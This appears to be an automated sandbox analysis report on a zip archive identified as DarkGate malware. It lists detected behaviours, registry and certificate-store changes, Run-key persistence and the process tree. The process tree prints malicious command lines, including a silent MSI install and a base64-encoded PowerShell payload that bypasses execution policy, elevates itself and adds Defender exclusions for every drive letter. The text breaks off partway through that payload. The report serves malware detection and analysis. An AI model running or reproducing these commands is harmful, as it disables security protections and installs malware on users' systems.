Analysis Overview
SHA256
9e8edbacb53fe27d3723151ab2d6ed203473edf666caebfab7dbf442bd68d463
Threat Level: Known bad
The file New Compressed (zipped) Folder.zip was found to be: Known bad.
Malicious Activity Summary
Suspicious use of NtCreateUserProcessOtherParentProcess
DarkGate
Blocklisted process makes network request
Downloads MZ/PE file
Requests dangerous framework permissions
Executes dropped EXE
Loads dropped DLL
Enumerates connected drives
Adds Run key to start application
Drops file in Windows directory
Enumerates physical storage devices
Unsigned PE
Suspicious use of SendNotifyMessage
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
Suspicious use of SetWindowsHookEx
Modifies registry class
Checks processor information in registry
Modifies data under HKEY_USERS
Enumerates system info in registry
Modifies system certificate store
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
Suspicious use of FindShellTrayWindow
Suspicious use of WriteProcessMemory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2023-11-17 20:16
Signatures
Requests dangerous framework permissions
| Description | Indicator | Process | Target |
| Allows an application to write to external storage. | android.permission.WRITE_EXTERNAL_STORAGE | N/A | N/A |
| Allows an application to read from external storage. | android.permission.READ_EXTERNAL_STORAGE | N/A | N/A |
Unsigned PE
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Analysis: behavioral1
Detonation Overview
Submitted
2023-11-17 20:15
Reported
2023-11-17 20:21
Platform
win10-20231025-en
Max time kernel
273s
Max time network
314s
Command Line
Signatures
DarkGate
Suspicious use of NtCreateUserProcessOtherParentProcess
| Description | Indicator | Process | Target |
| PID 4060 created 420 | N/A | C:\tepp\AutoIt3.exe | C:\Windows\system32\DllHost.exe |
| PID 4060 created 764 | N/A | C:\tepp\AutoIt3.exe | C:\Windows\system32\fontdrvhost.exe |
| PID 4060 created 2940 | N/A | C:\tepp\AutoIt3.exe | C:\Windows\System32\Conhost.exe |
| PID 4060 created 1648 | N/A | C:\tepp\AutoIt3.exe | C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe |
| PID 4060 created 1512 | N/A | C:\tepp\AutoIt3.exe | C:\Windows\system32\wbem\wmiprvse.exe |
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WScript.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Downloads MZ/PE file
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | N/A | C:\tepp\AutoIt3.exe | N/A |
Loads dropped DLL
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
| N/A | N/A | C:\Windows\syswow64\MsiExec.exe | N/A |
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\BraveCrashHandler = "C:\\Users\\Admin\\AppData\\Roaming\\BraveCrashHandler.exe" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates connected drives
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\Installer\MSI5594.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\e58efba.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF150.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF366.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\inprogressinstallinfo.ipi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI3EEE.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\e58efba.msi | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF422.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File created | C:\Windows\Installer\SourceHash{1C305533-9700-4743-83AA-EEF0896C4929} | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF54C.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF628.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\ | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF986.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI7EF7.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI68FD.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF2D8.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF723.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSIF956.tmp | C:\Windows\system32\msiexec.exe | N/A |
| File opened for modification | C:\Windows\Installer\MSI1879.tmp | C:\Windows\system32\msiexec.exe | N/A |
Enumerates physical storage devices
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | C:\tepp\AutoIt3.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\tepp\AutoIt3.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies data under HKEY_USERS
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| Set value (int) | \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133447259646841693" | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-2852493121-870915337-2715324265-1000_Classes\Local Settings | C:\Windows\system32\OpenWith.exe | N/A |
Modifies system certificate store
| Description | Indicator | Process | Target |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\743AF0529BD032A0F44A83CDD4BAA97B7C2EC49A\Blob = 190000000100000010000000683f58e5528121a89cf21532e700535f030000000100000014000000743af0529bd032a0f44a83cdd4baa97b7c2ec49a1d000000010000001000000056073d58ce8c0d7b5056f74735db0b62140000000100000014000000f960bbd4e3d534f6b8f5068025a773db4669a89e6200000001000000200000002e7bf16cc22485a7bbe2aa8696750761b0ae39be3b2fe9d0cc6d4ef73491425c09000000010000004c000000304a06082b0601050507030206082b06010505070303060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703080b000000010000005e000000530053004c002e0063006f006d00200045005600200052006f006f0074002000430065007200740069006600690063006100740069006f006e00200041007500740068006f007200690074007900200052005300410020005200320000005300000001000000850000003081823022060c2b0601040182a9300103010430123010060a2b0601040182373c0101030200c03022060c2b0601040182a9300103030230123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00f0000000100000020000000cf1152c4bfbd96b6d381b61e0c66e7a74b1185518120396449abe53aaadf640b2000000001000000ef050000308205eb308203d3a003020102020856b629cd34bc78f6300d06092a864886f70d01010b0500308182310b3009060355040613025553310e300c06035504080c0554657861733110300e06035504070c07486f7573746f6e31183016060355040a0c0f53534c20436f72706f726174696f6e3137303506035504030c2e53534c2e636f6d20455620526f6f742043657274696669636174696f6e20417574686f7269747920525341205232301e170d3137303533313138313433375a170d3432303533303138313433375a308182310b3009060355040613025553310e300c06035504080c0554657861733110300e06035504070c07486f7573746f6e31183016060355040a0c0f53534c20436f72706f726174696f6e3137303506035504030c2e53534c2e636f6d20455620526f6f742043657274696669636174696f6e20417574686f726974792052534120523230820222300d06092a864886f70d01010105000382020f003082020a02820201008f366540e1d64dc0d7b4e946da6bea3347cd4cf97d7dbebd2d3df0db78e186a5d9ba095768ed573ea0d0084183e72841241fe37215d0011afb5e7023b2cb9f39e3cfc54ec6926d26c67bbbb3da279d0a86e9813705fef07171ecc31ce963a217149def1b67d385550202d649c9cc5ae1b1f76f329fc9d43b8841a89cbdcbabdb6d7b091fa24c7290da2b08fccf3c54ce670fa8cf5d96190bc4e372ebadd17d1d27ef92eb10bf5beb3bafcf80ddc1d296045b7a7ea4a93c3876a4628ea0395eea77cf5d00598f662c3e07a2a30526116997ea85b70f960b4bc840e150ba2e8acbf70f9a22e77f9a3713cdf24d136b21d1c0cc22f2a146f644699cca613507006fd6610811eabab8f6e9b360e54db9ec9f1466c95758dbcd8769f88a86120347bf661376ac777d34248583cdd7aa9c901a9f212c7f78b764b8d8e8a6f478b355cb84d232c478aea38f61ddce0853adec88fc15e49a0de69f1a77ce4c8fb814153d629c863806006612e459765a53c00298a2102b68447b8e79ce334a76aa5b81161bb58ad8d0007b5e62b409d686630ea6059549ba288b8893b2341cd8a4556eb71cd0de99553b23f422e0f9296626ec205077db4a0b8fbee5026070415ed4ae5039221426cbb23b7374554707798139a8301344e5048aae961325420fb953c49bfccde41cde3cfaabd6064a1f67a698301cdd2cdbdc18955766c6ff5c8b56f5770203010001a3633061300f0603551d130101ff040530030101ff301f0603551d23041830168014f960bbd4e3d534f6b8f5068025a773db4669a89e301d0603551d0e04160414f960bbd4e3d534f6b8f5068025a773db4669a89e300e0603551d0f0101ff040403020186300d06092a864886f70d01010b0500038202010056b38ecb0a9d498ebfa4c491bb661705519875fbe5502c7a9ef114faabd38a3eff91298f638bd8b4a954010dbe93862ff94a6dc75ef557f9ca551c12be470f36c5df6ab7db75c247257fb9f163f8682d5504d1f28db0a4cfbc3c5e1f78e7a5a02070b004c5b7f772a7de220dbd3325468c649226e33e2e6396da9b8c3df81809d703cc7d8682e0ca04075150d7ff92d50cefda869f99d7ebb7af68e2392694ba68b7bf83d3ea7a673d6267ae25e572e8e2e4ecae12f64b2b3c9fe9b040f33854b3fdb768c8dac68f513cb2fb91dc1ce79b9de1b70d728fe2a4c4a978f9eb14acc64305c26539281802c382b29d05be65ed965f65743cfb09352e7b9c13fd1b0f5dc76d813a560fcc3be1af022f22ac46ca463ca01c4cd644b45e2e5c156609e12629fec65261bab173ffc30c9ce56c6a943f14ca40169584f359a9ac5f4c61936dd13bcca2950c22a66767442eb9d9d28a41b3660b5afb7d23a5f21ab0ffde9b83942ed13fdf92b791af053b65c7a06cb1cd6212c3901be325ce34bc6f7776b110c3f7051ac0d6af7462481777926990611cde958074548f181cc3f303d0bfa443758653187a0a2e091c369f91fd828a224bd10e5025ddcb030c17c98300084e354d8a8bedf00294662c447fcb95279617ad0930acb671176e8b17f61c09d42d3b98a571d35413d960f3f54b664ffaf1ee20128db4ac57b14563a1ac76a9c2fb | C:\Windows\System32\WScript.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\743AF0529BD032A0F44A83CDD4BAA97B7C2EC49A | C:\Windows\System32\WScript.exe | N/A |
| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\743AF0529BD032A0F44A83CDD4BAA97B7C2EC49A\Blob = 0f0000000100000020000000cf1152c4bfbd96b6d381b61e0c66e7a74b1185518120396449abe53aaadf640b5300000001000000850000003081823022060c2b0601040182a9300103010430123010060a2b0601040182373c0101030200c03022060c2b0601040182a9300103030230123010060a2b0601040182373c0101030200c0301b060567810c010130123010060a2b0601040182373c0101030200c0301b060567810c010330123010060a2b0601040182373c0101030200c00b000000010000005e000000530053004c002e0063006f006d00200045005600200052006f006f0074002000430065007200740069006600690063006100740069006f006e00200041007500740068006f0072006900740079002000520053004100200052003200000009000000010000004c000000304a06082b0601050507030206082b06010505070303060a2b0601040182370a030c060a2b0601040182370a030406082b0601050507030406082b0601050507030106082b060105050703086200000001000000200000002e7bf16cc22485a7bbe2aa8696750761b0ae39be3b2fe9d0cc6d4ef73491425c140000000100000014000000f960bbd4e3d534f6b8f5068025a773db4669a89e1d000000010000001000000056073d58ce8c0d7b5056f74735db0b62030000000100000014000000743af0529bd032a0f44a83cdd4baa97b7c2ec49a2000000001000000ef050000308205eb308203d3a003020102020856b629cd34bc78f6300d06092a864886f70d01010b0500308182310b3009060355040613025553310e300c06035504080c0554657861733110300e06035504070c07486f7573746f6e31183016060355040a0c0f53534c20436f72706f726174696f6e3137303506035504030c2e53534c2e636f6d20455620526f6f742043657274696669636174696f6e20417574686f7269747920525341205232301e170d3137303533313138313433375a170d3432303533303138313433375a308182310b3009060355040613025553310e300c06035504080c0554657861733110300e06035504070c07486f7573746f6e31183016060355040a0c0f53534c20436f72706f726174696f6e3137303506035504030c2e53534c2e636f6d20455620526f6f742043657274696669636174696f6e20417574686f726974792052534120523230820222300d06092a864886f70d01010105000382020f003082020a02820201008f366540e1d64dc0d7b4e946da6bea3347cd4cf97d7dbebd2d3df0db78e186a5d9ba095768ed573ea0d0084183e72841241fe37215d0011afb5e7023b2cb9f39e3cfc54ec6926d26c67bbbb3da279d0a86e9813705fef07171ecc31ce963a217149def1b67d385550202d649c9cc5ae1b1f76f329fc9d43b8841a89cbdcbabdb6d7b091fa24c7290da2b08fccf3c54ce670fa8cf5d96190bc4e372ebadd17d1d27ef92eb10bf5beb3bafcf80ddc1d296045b7a7ea4a93c3876a4628ea0395eea77cf5d00598f662c3e07a2a30526116997ea85b70f960b4bc840e150ba2e8acbf70f9a22e77f9a3713cdf24d136b21d1c0cc22f2a146f644699cca613507006fd6610811eabab8f6e9b360e54db9ec9f1466c95758dbcd8769f88a86120347bf661376ac777d34248583cdd7aa9c901a9f212c7f78b764b8d8e8a6f478b355cb84d232c478aea38f61ddce0853adec88fc15e49a0de69f1a77ce4c8fb814153d629c863806006612e459765a53c00298a2102b68447b8e79ce334a76aa5b81161bb58ad8d0007b5e62b409d686630ea6059549ba288b8893b2341cd8a4556eb71cd0de99553b23f422e0f9296626ec205077db4a0b8fbee5026070415ed4ae5039221426cbb23b7374554707798139a8301344e5048aae961325420fb953c49bfccde41cde3cfaabd6064a1f67a698301cdd2cdbdc18955766c6ff5c8b56f5770203010001a3633061300f0603551d130101ff040530030101ff301f0603551d23041830168014f960bbd4e3d534f6b8f5068025a773db4669a89e301d0603551d0e04160414f960bbd4e3d534f6b8f5068025a773db4669a89e300e0603551d0f0101ff040403020186300d06092a864886f70d01010b0500038202010056b38ecb0a9d498ebfa4c491bb661705519875fbe5502c7a9ef114faabd38a3eff91298f638bd8b4a954010dbe93862ff94a6dc75ef557f9ca551c12be470f36c5df6ab7db75c247257fb9f163f8682d5504d1f28db0a4cfbc3c5e1f78e7a5a02070b004c5b7f772a7de220dbd3325468c649226e33e2e6396da9b8c3df81809d703cc7d8682e0ca04075150d7ff92d50cefda869f99d7ebb7af68e2392694ba68b7bf83d3ea7a673d6267ae25e572e8e2e4ecae12f64b2b3c9fe9b040f33854b3fdb768c8dac68f513cb2fb91dc1ce79b9de1b70d728fe2a4c4a978f9eb14acc64305c26539281802c382b29d05be65ed965f65743cfb09352e7b9c13fd1b0f5dc76d813a560fcc3be1af022f22ac46ca463ca01c4cd644b45e2e5c156609e12629fec65261bab173ffc30c9ce56c6a943f14ca40169584f359a9ac5f4c61936dd13bcca2950c22a66767442eb9d9d28a41b3660b5afb7d23a5f21ab0ffde9b83942ed13fdf92b791af053b65c7a06cb1cd6212c3901be325ce34bc6f7776b110c3f7051ac0d6af7462481777926990611cde958074548f181cc3f303d0bfa443758653187a0a2e091c369f91fd828a224bd10e5025ddcb030c17c98300084e354d8a8bedf00294662c447fcb95279617ad0930acb671176e8b17f61c09d42d3b98a571d35413d960f3f54b664ffaf1ee20128db4ac57b14563a1ac76a9c2fb | C:\Windows\System32\WScript.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
| N/A | N/A | C:\Program Files\Google\Chrome\Application\chrome.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of FindShellTrayWindow
Suspicious use of SendNotifyMessage
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
| N/A | N/A | C:\Windows\system32\OpenWith.exe | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe
"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service
C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
C:\Windows\Explorer.exe
C:\Windows\Explorer.exe /idlist,,"C:\Users\Admin\AppData\Local\Temp\New Compressed (zipped) Folder.zip"
C:\Windows\system32\fontdrvhost.exe
"fontdrvhost.exe"
C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
C:\Program Files\7-Zip\7zG.exe
"C:\Program Files\7-Zip\7zG.exe" a -i#7zMap24083:256:7zEvent10066 -tzip -sae -- "C:\Users\Admin\Desktop\New Compressed (zipped) Folder\c788100411c38388afc3438dccc05297ac7a77083f579e4a7e8d6e1479214fde.zip"
C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe
"C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe"
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding C9345F958E073D9A352901F311135479 C
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i C:\Users\Admin\AppData\Local\Temp\FreeSoftPlace\2023.11.06\96C4929\FreeSoftPlace.msi MSIINSTALLPERUSER=1 ALLUSERS=2 /qn AI_SETUPEXEPATH="C:\Users\Admin\Desktop\New Compressed (zipped) Folder\7f16cb7b70229203d4a5c342f622ba961d97d7b2c55ed9ce6cb9ba977971e5c5.exe" SETUPEXEDIR="C:\Users\Admin\Desktop\New Compressed (zipped) Folder\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1700011584 " AI_EUIMSI=""
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 6FC05007F91D76C17A3DADA8AA1B62F4
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssFAE8.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiFAD6.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrFAD7.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrFAE7.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc UwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAAQwB1AHIAcgBlAG4AdABVAHMAZQByACAAQgB5AHAAYQBzAHMAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAtAFMAYwBvAHAAZQAgAEwAbwBjAGEAbABNAGEAYwBoAGkAbgBlACAAQgB5AHAAYQBzAHMAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIAAtAFMAYwBvAHAAZQAgAE0AYQBjAGgAaQBuAGUAUABvAGwAaQBjAHkAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBpAGYAKAAtAE4AbwB0ACAAJAAoACQAKAB3AGgAbwBhAG0AaQApACAALQBlAHEAIAAiAG4AdAAgAGEAdQB0AGgAbwByAGkAdAB5AFwAcwB5AHMAdABlAG0AIgApACkAIAB7AAoAIAAgACAAIAAkAEkAcwBTAHkAcwB0AGUAbQAgAD0AIAAkAGYAYQBsAHMAZQAKAAoAIAAgACAAIABpAGYAIAAoAC0ATgBvAHQAIAAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAFAAcgBpAG4AYwBpAHAAYQBsAF0AIABbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkAKQAuAEkAcwBJAG4AUgBvAGwAZQAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEIAdQBpAGwAdABJAG4AUgBvAGwAZQBdACAAJwBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByACcAKQApACAAewAKACAAIAAgACAAIAAgACAAIAAkAEMAbwBtAG0AYQBuAGQATABpAG4AZQAgAD0AIAAiAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABCAHkAcABhAHMAcwAgAGAAIgAiACAAKwAgACQATQB5AEkAbgB2AG8AYwBhAHQAaQBvAG4ALgBNAHkAQwBvAG0AbQBhAG4AZAAuAFAAYQB0AGgAIAArACAAIgBgACIAIAAiACAAKwAgACQATQB5AEkAbgB2AG8AYwBhAHQAaQBvAG4ALgBVAG4AYgBvAHUAbgBkAEEAcgBnAHUAbQBlAG4AdABzAAoAIAAgACAAIAAgACAAIAAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgAFAAbwB3AGUAcgBTAGgAZQBsAGwALgBlAHgAZQAgAC0AVgBlAHIAYgAgAFIAdQBuAGEAcwAgAC0AQQByAGcAdQBtAGUAbgB0AEwAaQBzAHQAIAAkAEMAbwBtAG0AYQBuAGQATABpAG4AZQAKACAAIAAgACAAIAAgACAAIABFAHgAaQB0AAoAIAAgACAAIAB9AAoACgAgACAAIAAgACQAcABzAGUAeABlAGMAXwBwAGEAdABoACAAPQAgACQAKABHAGUAdAAtAEMAbwBtAG0AYQBuAGQAIABQAHMARQB4AGUAYwAgAC0ARQByAHIAbwByAEEAYwB0AGkAbwBuACAAJwBpAGcAbgBvAHIAZQAnACkALgBTAG8AdQByAGMAZQAgAAoAIAAgACAAIABpAGYAKAAkAHAAcwBlAHgAZQBjAF8AcABhAHQAaAApACAAewAKACAAIAAgACAAIAAgACAAIAAkAEMAbwBtAG0AYQBuAGQATABpAG4AZQAgAD0AIAAiACAALQBpACAALQBzACAAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACAALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAEIAeQBwAGEAcwBzACAAYAAiACIAIAArACAAJABNAHkASQBuAHYAbwBjAGEAdABpAG8AbgAuAE0AeQBDAG8AbQBtAGEAbgBkAC4AUABhAHQAaAAgACsAIAAiAGAAIgAgACIAIAArACAAJABNAHkASQBuAHYAbwBjAGEAdABpAG8AbgAuAFUAbgBiAG8AdQBuAGQAQQByAGcAdQBtAGUAbgB0AHMAIAAKACAAIAAgACAAIAAgACAAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBXAGkAbgBkAG8AdwBTAHQAeQBsAGUAIABIAGkAZABkAGUAbgAgAC0ARgBpAGwAZQBQAGEAdABoACAAJABwAHMAZQB4AGUAYwBfAHAAYQB0AGgAIAAtAEEAcgBnAHUAbQBlAG4AdABMAGkAcwB0ACAAJABDAG8AbQBtAGEAbgBkAEwAaQBuAGUACgAgACAAIAAgACAAIAAgACAAZQB4AGkAdAAKACAAIAAgACAAfQAgAGUAbABzAGUAIAB7AAoAIAAgACAAIAB9AAoACgB9ACAAZQBsAHMAZQAgAHsACgAgACAAIAAgACQASQBzAFMAeQBzAHQAZQBtACAAPQAgACQAdAByAHUAZQAKAH0ACgAKADYANwAuAC4AOQAwAHwAZgBvAHIAZQBhAGMAaAAtAG8AYgBqAGUAYwB0AHsACgAgACAAIAAgACQAZAByAGkAdgBlACAAPQAgAFsAYwBoAGEAcgBdACQAXwAKACAAIAAgACAAQQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgACIAJAAoACQAZAByAGkAdgBlACkAOgBcACIAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUACgAgACAAIAAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAAtAEUAeABjAGwAdQBzAGkAbwBuAFAAcgBvAGMAZQBzAHMAIAAiACQAKAAkAGQAcgBpAHYAZQApADoAXAAqACIAIAAtAEUAcgByAG8AcgBBAGMAdABpAG8AbgAgAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUACgB9AAoACgBTAGUAdAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBMAG8AdwBUAGgAcgBlAGEAdABEAGUAZgBhAHUAbAB0AEEAYwB0AGkAbwBuACAAQQBsAGwAbwB3ACAALQBFAHIAcgBvAHIAQQBjAHQAaQBvAG4AIABTAGkAbABlAG4AdABsAHkAQwBvAG4AdABpAG4AdQBlAAoAUwBlAHQALQBNAHAAUAByAGUAZgBl